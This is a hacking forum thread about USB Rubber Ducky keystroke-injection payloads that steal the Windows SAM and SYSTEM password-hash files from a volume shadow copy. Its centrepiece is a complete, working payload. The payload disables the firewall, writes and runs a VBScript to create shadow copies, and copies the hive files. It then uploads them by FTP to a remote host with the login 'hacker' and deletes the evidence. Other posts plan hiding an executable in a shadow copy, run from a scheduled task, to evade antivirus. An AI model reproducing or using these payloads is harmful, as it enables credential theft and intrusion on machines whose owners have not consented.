Jump to content

[Question] Retrieve Sam And System From A Live File System


Xcellerator
 Share

Recommended Posts

Hi guys,

I read this article here, and thought that it'd work great as a Ducky Payload. I originally wrote it for my Teensy board (I don't have a USBRD) but then rewrote it for the Ducky. I admit it's not the cleanest code in the world (the Teensy version), but it works.

The delays are just a guide to work with MOST machines, but on a faster machine (a server for example, :o ), I'm sure you could reduce them greatly.

Here is the link the code on the USBRD Wiki: LINK, and there is also a link to the pastebin with the Teensy version aswell in the description.

Let me know what you think!

Link to comment
Share on other sites

Yeah, I saw a demonstration of it and thought that it'd work brilliantly as payload...

I played a little bit with it.

For Rubberducky payloads it makes not that much sense, since we do everything by keyboard and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it, we want to execute it right now!

It might be interesting if you want to place the executable on the target system and then run it via a Scheduled task that you also setup with the ducky.

I think about the following

1. Create executable via base64 encoding through VBScript in the windows\system32 folder

2. Place vssown.vbs on target system

2. Create a shadow copy

3. Delete your executable

4. Setup a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe

The only advantage of this procedure would be that evil.exe is not visible for nearly 99% of users since no one would mount a Shadow Copy.

My opinion: Good idea but not so practical for the Ducky. Maybe if we could access the ducky's flash somehow it might be interesting in the future.

Cheers Peter

Link to comment
Share on other sites

That's an interesting idea, and I would be very interested in incorporating that idea into a Metasploit Module. One of the most difficult things about binary dropping from Metasploit is AV's picking them up, and leaving tracks on the target. Although they can be removed upon successful exploitation, any errors can be fatal.

Also, has any checked to see if AVs do pick up on executables stored in a shadow copy? I'd be very surprised if it can...

Link to comment
Share on other sites

  • 4 weeks later...

Has anyone actually gotten this script to work? I've been trying it on my win7 box, but have had no luck.

What script do you mean? The vssown.vbs? It should work on a Win7 Box without any problems (administrative shell required).

Cheers

PCFreak

Link to comment
Share on other sites

I had problems with it...

1)There are a couple of typos in the USBRD script:

"STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM ."

"STRING copy \\?\GLoBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM ."

2) My test box didn't have a "HarddiskVolumeShadowCopy1" so the script would fail, delete the .vbs files and exit without displaying the error.

I commented out the lines to exit and delete the vbs files and ran vssown.vbs /list to see if "1" existed and it did not. Every time the /create line runs it would increment (11, 12, 13) so I edited the payload to change "1" to the next expected shadowcopy# and then it finally copied the files.

Perhaps the payload should use /list to determine the next shadow created or try the next 25 #s if "HarddiskVolumeShadowCopy1" fails?

Link to comment
Share on other sites

  • 6 months later...
  • 7 months later...

Here's the VSSown payload rebuilt... Instead of downloading VSSOwn, this payload builds a modified version of the vbs file (only the needed parts).. It runs the "/create c" five times. The reason for this is because each operating system typically already has 2-3 shadow copies and we want a new shadow copy with the current hashes. In addition to pulling the SAM & SYSTEM files, this payload drops the firewall and sends the files to a remote FTP server. Sending these files via FTP (in the clear) on a pentest will likely get you sued, this is just an example on how to extract the data... This payload runs on Windows 7 w/UAC enabled. This payload will be added to the simple-ducky in the next update.

DELAY 2000
ESCAPE
DELAY 600
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 600
MENU
DELAY 600
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
STRING cd %USERPROFILE%
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING copy con vssown.vbs
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING strComputer = "."
ENTER
STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
ENTER 
STRING Select Case args.Item(0)
ENTER 
STRING   Case "/start"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StartService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0)
ENTER 
STRING   Case "/stop"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StopService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0) 
ENTER 
STRING   Case "/create"
ENTER
STRING     VOLUME = args.Item(1) & ":\"
ENTER
STRING     Const CONTEXT = "ClientAccessible"
ENTER
STRING     Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
ENTER
STRING     Wscript.Echo "[*] Attempting to create a shadow copy."
ENTER
STRING     errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
ENTER
STRING     wscript.Quit(errResult)
ENTER
STRING End Select
ENTER
CTRL z
ENTER
STRING cscript vssown.vbs /start
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING cscript vssown.vbs /create c
ENTER
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM .
ENTER
DELAY 1000
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM .
ENTER
DELAY 1000
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING ftp
ENTER
DELAY 500
STRING open 192.168.10.109
ENTER
DELAY 800
STRING hacker
ENTER
DELAY 1000
STRING hacker
ENTER
DELAY 1000
STRING bin
ENTER
DELAY 800
STRING put SAM
ENTER
DELAY 800
STRING put SYSTEM
ENTER
DELAY 800
STRING quit
ENTER
DELAY 200
STRING DEL SAM
ENTER
STRING DEL SYSTEM
ENTER
STRING DEL vssown.vbs
ENTER
STRING exit
ENTER

~skysploit

Link to comment
Share on other sites

  • 2 weeks later...

Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network!

Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..!

Edited by Xcellerator
Link to comment
Share on other sites

Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network!

Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..!

Download the latest version of the simple-ducky (v1.1.0): https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.0_debian.sh&can=2&q=

It has a modified version of this payload which uses 7za to AES256 encrypt the extracted files prior to sending them over ftp. It also has a built in hasher and custom wordlist builder. So say if you are pentesting company X, you can download their website and generate a password list based on every word extracted. You are then prompted with the option to merge the new list with the default list in John.

~skysploit

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...